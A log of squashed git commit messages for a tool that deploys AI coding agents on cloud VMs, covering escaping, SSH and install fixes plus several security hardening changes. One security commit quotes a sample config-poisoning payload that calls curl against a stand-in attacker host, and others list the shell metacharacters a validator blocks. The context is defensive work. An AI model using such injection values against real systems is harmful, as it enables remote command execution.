Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: skip sudo in gh install when running as root (Fly.io containers)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id
- verify_openrouter_key and verify_openrouter_model skip network calls when
SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set
- install_agent timeout wrapper now quotes the escaped command for defense in depth
- model_id in openclaw JSON now uses json_escape() for consistency
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: remove double-escaping in install_agent that broke shell operators
install_agent() was wrapping commands with printf '%q' + bash -c before
passing them to the run callback. But run callbacks (run_server, run_sprite,
ssh_run_server) already handle escaping for remote transport. The double-
escaping turned && || > | into literal characters, causing 'source' to
treat the entire command as a single filename.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use local github-auth.sh instead of curling from main
When running from a local checkout, base64-encode the local
github-auth.sh and send it inline to the remote machine. This
ensures fixes (like the sudo skip for root) take effect immediately
without waiting for a merge to main.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle github-auth errors gracefully instead of terminating
GitHub CLI setup is optional — failures should not abort the spawn
session. Guard both run_callback calls in offer_github_auth with
|| log_warn so the script continues even if gh install fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use GOOGLE_GEMINI_BASE_URL to route Gemini CLI through OpenRouter
Gemini CLI ignores OPENAI_BASE_URL — it uses GEMINI_API_KEY to talk
directly to Google's API. The OpenRouter key is not a valid Google
API key, so all requests fail with "API key not valid".
Use GOOGLE_GEMINI_BASE_URL to redirect Gemini CLI to OpenRouter's
endpoint. Fixes all 9 cloud gemini scripts + manifest.json.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: guard optional spawn_agent hooks so failures don't kill the session
With set -eo pipefail, any unguarded failure terminates the script.
Several optional operations in spawn_agent were unguarded:
- agent_configure: config file uploads (agent works with defaults)
- agent_save_connection: convenience JSON for spawn list
- agent_pre_launch: gateway daemons, startup hooks
- agent_pre_provision: pre-provision prompts
- .spawnrc shell hooks: injecting env vars into .bashrc/.zshrc
These now log warnings and continue instead of aborting. Critical
steps (cloud_authenticate, agent_install, cloud_provision) still
exit on failure.
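The guard pattern sketched below shows the mechanism under `set -eo pipefail`; `log_warn` and the failing hook body are illustrative stand-ins, not the real implementations:

```shell
# Minimal sketch of the guard pattern; hook body and log_warn are illustrative.
set -eo pipefail

log_warn() { printf 'WARN: %s\n' "$1" >&2; }

agent_configure() { return 1; }  # stand-in for an optional hook that fails

# Unguarded, this failure would kill the whole session under set -e.
# Guarded, it degrades to a warning and the spawn continues.
agent_configure || log_warn 'agent_configure failed; continuing with defaults'

result="session still alive"
echo "$result"
```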
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: audit and fix env vars, escaping, and error handling across all agents
Audit findings from 3 parallel agents, fixes applied:
**Env vars (4 agents fixed across 9 clouds each = 36 scripts):**
- Amazon Q: remove fake OPENAI_* vars (Q uses AWS auth, can't use OpenRouter)
- Cline: replace OPENAI_* env vars with `cline auth -p openrouter` command
- Open Interpreter: drop OPENAI_* vars, use only OPENROUTER_API_KEY (native support via --model flag)
- NanoClaw: add ANTHROPIC_BASE_URL to .env file (was missing, requests went to Anthropic directly)
**Escaping:**
- execute_agent_non_interactive: replace printf '%q' with single-quote wrapping to avoid double-escaping on Fly.io
**Manifest updated** for amazonq, cline, interpreter entries.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use setsid to detach openclaw gateway daemon from SSH sessions
The gateway daemon launch (`nohup openclaw gateway ... & disown`) hangs
on all clouds because SSH/exec channels wait for child FDs to close.
setsid creates a new session, fully detaching the daemon so the channel
can close immediately. Falls back to nohup where setsid is unavailable.
Consolidates the daemon launch into a shared start_openclaw_gateway()
function used by all 9 cloud scripts.
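A sketch of the detached launch, assuming a helper shaped like the `start_openclaw_gateway()` the commit describes; the real function runs `openclaw gateway`, replaced here by a short `sleep` so the sketch is self-contained:

```shell
# Sketch of the detached daemon launch; the daemon command and log path
# are illustrative stand-ins for `openclaw gateway`.
start_openclaw_gateway_sketch() {
  local log="${1:-/tmp/gateway-sketch.log}"
  if command -v setsid >/dev/null 2>&1; then
    # New session: the daemon stops holding the SSH channel's stdio open,
    # so the exec channel can close immediately.
    setsid sleep 1 >"$log" 2>&1 </dev/null &
  else
    # Fallback for systems without setsid (e.g. stock macOS).
    nohup sleep 1 >"$log" 2>&1 </dev/null &
  fi
  disown 2>/dev/null || true
  echo launched
}
```

Redirecting all three stdio streams matters as much as the new session: any FD still tied to the channel keeps it open.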
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: configure npm global prefix for non-root clouds (AWS, GCP, OVH)
AWS Lightsail, GCP, and OVH SSH as non-root users (ubuntu/login user),
so `npm install -g` fails with EACCES on /usr/local/lib/node_modules/.
Fix: configure npm prefix to ~/.npm-global during cloud-init/setup and
add ~/.npm-global/bin to the SSH PATH prefix so agent install commands
find globally-installed npm binaries without sudo.
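The setup step can be sketched as below; `$HOME/.npm-global` matches the commit, while the function name is illustrative:

```shell
# Sketch of the non-root npm setup, run during cloud-init/setup.
setup_npm_prefix() {
  local prefix="$HOME/.npm-global"
  mkdir -p "$prefix/bin"
  # Route `npm install -g` under $HOME instead of /usr/local (no sudo needed).
  if command -v npm >/dev/null 2>&1; then
    npm config set prefix "$prefix"
  fi
  # Later SSH commands must be able to see binaries installed there.
  PATH="$prefix/bin:$PATH"
  echo "$prefix"
}
```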
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: remove broken OpenRouter routing from Gemini CLI scripts
Gemini CLI uses Google's native API format (/v1beta/models/:streamGenerateContent),
not the OpenAI-compatible format (/v1/chat/completions). No base URL override can
bridge this — the request formats are fundamentally incompatible. Same situation
as Amazon Q (uses vendor-specific auth/API).
Removed GEMINI_API_KEY and GOOGLE_GEMINI_BASE_URL from all 9 scripts + manifest.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: auto-install AWS CLI and gcloud SDK when missing
Instead of printing manual install instructions and exiting, both CLIs
now auto-install:
- AWS: downloads official .pkg (macOS) or .zip (Linux) installer
- GCP: uses brew cask on macOS, Google's tarball installer on Linux
Falls back to manual instructions if auto-install fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: nanoclaw — install Docker on Linux, fix hardcoded /root/ path
Two issues broke NanoClaw on all clouds:
1. .env upload hardcoded /root/nanoclaw/.env — fails on non-root clouds
(AWS=ubuntu, GCP=user, OVH=ubuntu). Now uses upload_config_file with
$HOME which expands on the remote side.
2. NanoClaw requires a container runtime. On Linux it uses Docker, but
Docker was never installed. Added Docker install via get.docker.com
to all cloud scripts (with sudo where SSH user is non-root).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review findings from PR #1463
- Reject symlinked github-auth.sh before base64-encoding (falls back to remote URL)
- Hide API key from process list using curl -K - instead of -H in verify_openrouter_key
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: quote OPENROUTER_API_KEY in cline auth to prevent command injection
Unquoted variable in `cline auth -p openrouter -k ${OPENROUTER_API_KEY}`
allows shell metacharacters in the key to execute arbitrary commands on
the remote server. Wrapping the key in escaped double quotes makes the
remote shell treat it as a single literal argument.
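The before/after construction can be sketched as follows; the variable name comes from the commit, the hostile sample key and surrounding transport are illustrative:

```shell
# Sketch of the quoting fix; sample key is deliberately hostile-looking.
OPENROUTER_API_KEY='sk-or-abc;rm -rf /tmp/x'

# Before: unquoted -- the ; would split the remote command in two.
unsafe="cline auth -p openrouter -k ${OPENROUTER_API_KEY}"

# After: escaped double quotes make the key one literal argument when
# the string is evaluated on the remote server.
safe="cline auth -p openrouter -k \"${OPENROUTER_API_KEY}\""

printf '%s\n' "$safe"
```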
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Steps 3-4 (get_or_prompt_api_key and model selection) were executed
twice in spawn_agent() -- once before provisioning and once after.
This caused redundant HTTP validation calls to openrouter.ai/api for
every agent deployment (~130+ scripts use spawn_agent). The duplicate
step numbering in comments (3,4,5 then 4,5,6) confirms this was
accidental.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* docs: add spawn delete command to README
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: harden openclaw across all clouds — validation, reliability, performance
Fixes multiple issues causing openclaw to break on most clouds:
Bugs fixed:
- Double-prefixed model ID (openrouter/openrouter/auto) in config generation
- AWS gateway starting without env vars (missing .zshrc source)
- DigitalOcean sourcing .spawnrc instead of .zshrc for gateway
- Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p)
Validation added:
- API key checked against OpenRouter /auth/key endpoint with re-prompt on failure
- Model ID verified against OpenRouter model list with re-prompt loop
- openrouter/auto and openrouter/free bypass model check
Reliability improvements:
- Standardized gateway launch with </dev/null & disown across all 9 clouds
- Gateway log auto-displayed on startup timeout for diagnostics
- 2GB swap added to cloud-init to prevent OOM on small VMs
- Portable install timeout (10 min) with macOS gtimeout fallback
Performance:
- Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s)
- Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw
- Fly.io: tries bun first (faster), falls back to npm
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: skip sudo in gh install when running as root (Fly.io containers)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id
- verify_openrouter_key and verify_openrouter_model skip network calls when
SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set
- install_agent timeout wrapper now quotes the escaped command for defense in depth
- model_id in openclaw JSON now uses json_escape() for consistency
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fixes GitHub CLI authentication on remote VMs by passing the local token through to the remote installation script. Uses printf '%q' for safe shell escaping to prevent command injection.
Move OpenRouter OAuth and model selection prompts to run BEFORE
server provisioning in spawn_agent(). Previously the user had to
wait for the server to spin up before being prompted for their
API key and model choice. Now all interactive prompts (GitHub auth,
OpenRouter OAuth, model selection) happen upfront, then the server
provisions without further user interaction.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
1. _multi_creds_validate referenced undefined help_url variable, causing
empty "Get new credentials from: " error messages when OVH credential
validation fails. Added help_url as parameter and pass it from caller.
2. _spawn_inject_env_vars (used by 130+ agent scripts via spawn_agent)
uploaded credentials to static /tmp/env_config path. The older
inject_env_vars_ssh/inject_env_vars_cb functions document this as a
symlink attack vector and use randomized paths. Fixed to match.
3. Removed dead inject_env_vars_fly and inject_env_vars_sprite functions
(all agent scripts now use spawn_agent -> _spawn_inject_env_vars).
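The randomized-path fix (item 2) follows the pattern below; filenames are illustrative and the real upload transport is omitted:

```shell
# Sketch of the randomized-path upload. A fixed /tmp/env_config can be
# pre-created as a symlink by another local user; mktemp yields an
# unpredictable name created with mode 0600.
env_file=$(mktemp "${TMPDIR:-/tmp}/env_config.XXXXXX")
printf 'export OPENROUTER_API_KEY=%s\n' '<redacted>' >"$env_file"
echo "$env_file"
rm -f "$env_file"   # delete as soon as the remote side has consumed it
```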
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds
aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.
Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.
Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* test: update aider/gptme/interpreter assertions from pip to uv
The install method for aider, gptme, and open-interpreter was changed
from pip to `uv tool install` across all clouds. The mock test
assertions still checked for the old `pip.*install.*` patterns, causing
9 failures (3 agents × 3 clouds).
Update patterns to match the actual `uv tool install` commands now used
in all cloud scripts.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* ci: trigger test run for uv assertion fix
* fix: prevent SSH hangs, restore stderr, fix command escaping across clouds
- Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH
stdin theft causing sequential install/verify/configure steps to hang
- Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default
SSH_OPTS so long-running installs don't silently drop on flaky networks
- Remove 2>/dev/null from Fly.io run_server so remote command errors are
no longer silently swallowed (--quiet flag still suppresses flyctl noise)
- Fix Fly.io printf '%q' double-quoting: remove extra quotes around
$escaped_cmd that prevented the remote shell from consuming escapes,
breaking && || | operators in commands
- Remove broken printf '%q' from Daytona run_server and interactive_session
where it escaped shell operators into literal characters since daytona exec
has no intermediate shell layer
- Pin aider to --python 3.12 instead of --with audioop-lts across all clouds
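The first two bullets combine into an invocation like the sketch below. The `</dev/null` redirect and the three keepalive/timeout options come from the commit; the specific numeric values here are assumptions, not the repo's exact settings, and the function prints rather than executes so it stays self-contained:

```shell
# Sketch of the hardened SSH invocation; numeric values are assumptions.
SSH_OPTS="-o ServerAliveInterval=15 -o ServerAliveCountMax=4 -o ConnectTimeout=10"

ssh_run_server_sketch() {
  # </dev/null stops ssh from eating the caller's stdin, which otherwise
  # made the *next* sequential install/verify step appear to hang.
  echo ssh $SSH_OPTS "$1" "$2" </dev/null
}
```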
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add --pty to fly ssh console for interactive sessions
fly ssh console -C does not allocate a pseudo-terminal by default,
causing interactive TUI agents (aider, claude) to fail with
"Input is not a terminal (fd=0)" or completely unresponsive input.
Adding --pty forces PTY allocation, matching how other clouds handle
interactive sessions (SSH uses -t, Sprite uses -tty).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: prepend ~/.local/bin to PATH in ssh_run_server
After uv installs to ~/.local/bin, the current shell session doesn't
have it in PATH, causing "uv: command not found" on DigitalOcean and
all other SSH-based clouds (Hetzner, AWS, GCP, OVH).
Fly.io's run_server already prepends this PATH — now the shared
ssh_run_server does the same, fixing all SSH-based clouds at once.
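The prefix construction looks like the sketch below; the real function is `ssh_run_server`, shown here only as the command-building step with the transport omitted:

```shell
# Sketch of the PATH-prefix wrapper; function name is illustrative.
# Single quotes in the prefix keep $HOME/$PATH expanding remotely,
# not on the local machine.
build_remote_cmd() {
  printf '%s%s\n' 'export PATH="$HOME/.local/bin:$PATH"; ' "$1"
}
```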
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add Node.js to cloud-init for all cloud providers
npm-based agents (codex, kilocode, etc.) fail with "npm: command not
found" because Node.js isn't installed during cloud-init. Fly.io was
the only provider installing Node.js (in wait_for_cloud_init).
Now all cloud-init scripts install Node.js v22 LTS from nodesource,
matching Fly.io's setup. Also adds ~/.local/bin to PATH in AWS and
GCP cloud-init (was already in shared/DigitalOcean/Hetzner).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use apt packages for nodejs/npm instead of nodesource
The nodesource setup script (setup_22.x) runs its own apt-get update
and repository configuration, nearly doubling cloud-init time and
causing hangs on DigitalOcean. Ubuntu 24.04 includes nodejs and npm
in its default repos — just add them to the packages list.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add timeouts and better error handling to Daytona CLI commands
Daytona CLI commands (login, list, create) can hang indefinitely when
the API is slow or unreachable. This causes:
- "Failed to create sandbox: timeout" with no recovery
- Token validation timeouts misreported as "invalid token"
- Users re-entering valid tokens that also timeout
Fixes:
- Wrap all daytona CLI calls with timeout (30s for auth, 120s for create)
- Detect timeout errors separately from auth errors
- Show actionable "try again / check status" messages for timeouts
- Add nodejs/npm to Daytona wait_for_cloud_init
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: set DAYTONA_API_URL to Daytona Cloud by default
The Daytona CLI may default to connecting to a local self-hosted
server instead of Daytona Cloud. Without DAYTONA_API_URL set to
https://app.daytona.io/api, every CLI command (login, list, create)
hangs trying to reach a non-existent local server and times out.
The SDK documents this as the default, but the CLI doesn't always
pick it up — now we export it explicitly.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: symlink n-installed Node.js v22 over apt v18 to prevent shadowing
n installs Node.js v22 to /usr/local/bin/node but apt's v18 at
/usr/bin/node can shadow it in non-interactive SSH sessions. After
running `n 22`, symlink the new binaries over the apt ones so v22 is always
resolved. Also fix hcloud CLI token extraction for new TOML format.
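The relink step can be sketched as below. The real fix targets /usr/local/bin over /usr/bin; the directories are parameters here so the sketch runs without root:

```shell
# Sketch of the relink step; directory arguments are for illustration.
relink_node() {
  local src="$1" dst="$2" bin
  for bin in node npm npx; do
    if [ -x "$src/$bin" ]; then
      # Force v22 (from n) to win over apt's v18 copy of the same name.
      ln -sf "$src/$bin" "$dst/$bin"
    fi
  done
}
```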
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review, add curl timeouts to trigger workflows
- Fix ssh_run_server command injection concern: use single-quoted
path_prefix so $HOME/$PATH expand remotely, not locally
- Add --connect-timeout 15 --max-time 30 to trigger workflows to
prevent 5-min hangs when server streams responses
- Handle 409 (dedup) as success — expected when cron fires every 15min
but cycles take 35min
- Reduce workflow timeout-minutes from 5 to 2
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* feat: add QA upgrade — macOS compat linter, per-agent mock assertions
Layer 1: macOS compat linter (test/macos-compat.sh)
- 12 rules (MC001–MC012) catching bash 3.2 incompatibilities
- Detects: base64 -w0 file args, non-portable echo flags, source <(),
((var++)), read -d, nounset flag, sed -i, date %N, local -n,
declare -A, ${var,,}, and |&
- Added to CI lint.yml in warn-only mode for burn-in
- Integrated as Phase 0.5 in qa-dry-run.sh
Layer 2: Per-agent mock assertions
- test/fixtures/_shared_agent_assertions.sh with install checks
for all 15 agents (claude, openclaw, aider, goose, etc.)
- Integrated into test/mock.sh via _run_agent_assertions()
Also includes branch fixes:
- Fix base64 -w0 to use stdin redirect (aws, daytona, fly)
- Fix fly/openclaw to use npm install instead of broken curl|bash
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add E2E test harness and integrate into QA pipeline
Add test/e2e.sh — a full E2E test harness that provisions real servers,
installs agents, and verifies setup across all clouds. Features:
- Smoke test (one canary agent per cloud) and full matrix modes
- Credential auto-detection for 8 clouds
- Per-cloud preflight validation (sequential) then parallel agent tests
- Stale server cleanup, timing history, cross-cloud comparison
- Auto-fix and optimization phases via Claude agents
- macOS bash 3.2 compatible
Integrate E2E as Phase 5 in both qa-cycle.sh and qa-dry-run.sh:
- Runs after mock tests pass, gated on cloud credentials
- Phase 5b auto-fixes failures using per-agent worktree branches
- Parses results and includes in QA summary
Also fixes:
- shared/common.sh: honour SPAWN_NON_INTERACTIVE=1 in safe_read()
- aws/lib/common.sh: fix SSH key import (use cat instead of base64,
handle race condition on concurrent imports)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* security: prevent command injection in key-request.sh env var loading
Fixes #1405
**Why:**
The _try_load_env_var function loaded API tokens from ~/.config/spawn/{cloud}.json
without validating the value for shell metacharacters. If an attacker could write
malicious config files (e.g., {"HCLOUD_TOKEN": "$(curl evil.com)"}), the injected
commands would execute when the variable was later used in unquoted contexts.
**Changes:**
- Added regex validation in _try_load_env_var (lines 88-91) to reject values
containing shell metacharacters: ; ' " < > | & $ ` \ ( )
- Matches the same pattern used in validate_api_token() from shared/common.sh
- Now returns error and logs security warning if malicious characters detected
**Impact:**
Blocks command injection attacks via config file poisoning. API tokens must now
be clean alphanumeric strings (as they should be from legitimate providers).
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: strengthen key-request.sh regex to block all shell metacharacters
Address security review feedback from PR #1415.
**Changes:**
- Replace blocklist regex with whitelist: `^[a-zA-Z0-9._/@-]+$`
- Now blocks `!`, `{`, `}`, `#`, newlines, tabs, and all other metacharacters
- Update comment to clarify defense-in-depth purpose
- Change error message to match validate_api_token() pattern
**Why whitelist approach:**
API tokens from legitimate cloud providers only contain alphanumeric
characters plus safe chars (-, _, ., /, @). Whitelist is more robust
than trying to enumerate all dangerous shell metacharacters.
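The check can be sketched as below; the character class matches the regex in this commit (`^[a-zA-Z0-9._/@-]+$`), implemented here with a `case` glob so it also runs on bash 3.2 (the real code may use `[[ =~ ]]` instead):

```shell
# Sketch of the whitelist check; glob class mirrors the commit's regex.
validate_token_charset() {
  case "$1" in
    '') return 1 ;;                   # empty is not a token
    *[!a-zA-Z0-9._/@-]*) return 1 ;;  # any char outside the whitelist
    *) return 0 ;;
  esac
}
```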
-- pr-maintainer
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix medium severity findings from scan #763
Addresses remaining medium-severity security findings from issue #763:
1. **Path traversal in invalidate_cloud_key** (shared/key-request.sh)
- Removed dots from provider name validation regex
- Changed from ^[a-z0-9][a-z0-9._-]{0,63}$ to ^[a-z0-9][a-z0-9_-]{0,63}$
- Prevents path traversal via sequences like "foo..bar"
2. **Background process timeout** (shared/key-request.sh)
- Wrapped fire-and-forget key request in timeout 15s
- Prevents leaked subprocess if curl hangs beyond --max-time
3. **Rate limiting IP spoofing** (.claude/skills/setup-agent-team/key-server.ts)
- Switched from x-forwarded-for header to server.requestIP(req)
- Uses actual connection IP instead of spoofable header
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add macOS portability for timeout command
Address review feedback from security team - timeout command is not available
on macOS by default. Added fallback pattern that:
- Uses timeout on Linux (prevents subprocess leak)
- Falls back to curl --max-time only on macOS
This ensures request_missing_cloud_keys() works on both platforms.
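The fallback pattern looks like this sketch; the wrapper name and the timeout value are illustrative:

```shell
# Sketch of the portable timeout fallback. On Linux, timeout bounds the
# whole subprocess; on macOS, where coreutils timeout is absent, curl's
# own --max-time remains the only bound.
run_with_timeout() {
  local secs="$1"; shift
  if command -v timeout >/dev/null 2>&1; then
    timeout "$secs" "$@"
  else
    "$@"
  fi
}
```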
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix command injection vulnerability in key-request.sh
Fixes the critical command injection vulnerability identified in security review.
Changes:
- Use positional parameters ($1, $2, $3) instead of variable interpolation in bash -c
- Pass variables via -- delimiter to prevent shell escaping issues
- Replace echo with printf for proper formatting (macOS bash 3.x compat)
- Maintain timeout wrapper on Linux and curl --max-time fallback on macOS
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Implements spawn name feature (#1372) to improve UX:
- Add optional spawn name prompt in interactive mode
- Pass spawn name via SPAWN_NAME env var to shell scripts
- Shell scripts use spawn name as default for resource names
- Store spawn name in history for future reference
- Bump CLI version to 0.4.0
The spawn name is prompted before agent/cloud selection and
automatically used as the default for platform-specific resource
names (server name on Hetzner, sprite name on Sprite, etc.).
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: re-prompt on taken Fly.io app names + timeout run_server
Two fixes for Fly.io UX:
1. When app name is globally taken by another user, re-prompt instead
of failing. Returns exit code 2 from _fly_create_app so create_server
can loop with a new name.
2. run_server now has a 5-minute timeout (portable, no coreutils needed)
to prevent indefinite hangs like the 3-hour SSH session stall.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: wait for SSH before installing tools on Fly.io
The previous wait_for_cloud_init immediately ran apt-get via fly ssh
console on a machine that wasn't SSH-reachable yet, causing indefinite
hangs. Now:
1. _fly_wait_for_ssh polls with a 30s-timeout echo until SSH responds
2. Shows progress at each step instead of suppressing all output
3. Each run_server call has an explicit timeout (10min for apt, 2min
for bun, 30s for PATH exports)
4. Retries package install once on timeout
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: run fly ssh console in foreground, not background
fly ssh console breaks when backgrounded with & — it needs a foreground
process to establish the connection. Reverted to foreground execution
and use timeout/gtimeout when available (Linux/CI). On macOS where
timeout isn't available, the user can Ctrl+C hung commands.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: ensure bun PATH is available in non-interactive fly ssh sessions
Ubuntu's default .bashrc returns early for non-interactive shells,
so "source ~/.bashrc && bun install -g openclaw" silently fails —
the PATH line at the bottom of .bashrc is never reached.
Fix by prepending ~/.bun/bin to PATH in run_server() so all remote
commands have access to tools installed during wait_for_cloud_init.
Also fix spawn_agent to explicitly handle agent_install failure
instead of relying on set -e (which exits silently).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: validate saved API tokens before use
Tokens loaded from config files (e.g. ~/.config/spawn/fly.json) were
never validated, so expired or revoked tokens would silently pass through
and only fail at the point of use (e.g. app creation). Now the provider's
test function runs on config-file tokens too, falling through to a fresh
prompt if validation fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle FlyV1 token auth scheme for Fly.io Machines API
Fly.io dashboard tokens use the format "FlyV1 fm2_..." where "FlyV1" is
the authorization scheme itself, not a Bearer token prefix. The script was
always sending "Authorization: Bearer FlyV1 fm2_..." which the API rejects
with "token validation error". Now detects FlyV1-prefixed tokens and sends
them as "Authorization: FlyV1 fm2_..." using custom auth headers.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: make refactor service actually run reliably
Three fixes for the refactor workflow that was producing zero PRs:
1. community-coordinator: Gemini → Sonnet — Gemini doesn't support
the Task tool, causing a respawn on every single cycle
2. Monitoring loop: replace "sleep 5" (which drifted to sleep 30)
with explicit short-sleep instructions and CRITICAL rule that
every turn must include a tool call to stay alive
3. Lifecycle management: explicit shutdown sequence with retry,
preventing early exit that orphans teammates
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fixes #1354 - users experienced a ~30s delay with "gateway not connected"
errors when trying to use OpenClaw immediately after launch.
Root cause: gateway takes time to bind to port 18789, but TUI launched
after only 2 seconds.
Solution: Add wait_for_openclaw_gateway() helper that polls the gateway
port (max 30s) before launching TUI, ensuring immediate usability.
Changes:
- shared/common.sh: Add wait_for_openclaw_gateway() function
- All openclaw.sh scripts (10 files): Replace sleep 2 with gateway readiness check
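The readiness check described above can be sketched as below; the name and default port come from the commit, while the `/dev/tcp` probe and the one-second poll interval are assumptions about the real implementation:

```shell
# Sketch of the gateway readiness helper; probe method is an assumption.
wait_for_openclaw_gateway_sketch() {
  local port="${1:-18789}" max="${2:-30}" waited=0
  while [ "$waited" -lt "$max" ]; do
    # bash's /dev/tcp connect succeeds only once something is listening.
    if (exec 3<>"/dev/tcp/127.0.0.1/$port") 2>/dev/null; then
      echo "gateway ready after ${waited}s"
      return 0
    fi
    sleep 1
    waited=$((waited + 1))
  done
  echo "gateway not ready after ${max}s" >&2
  return 1
}
```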
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>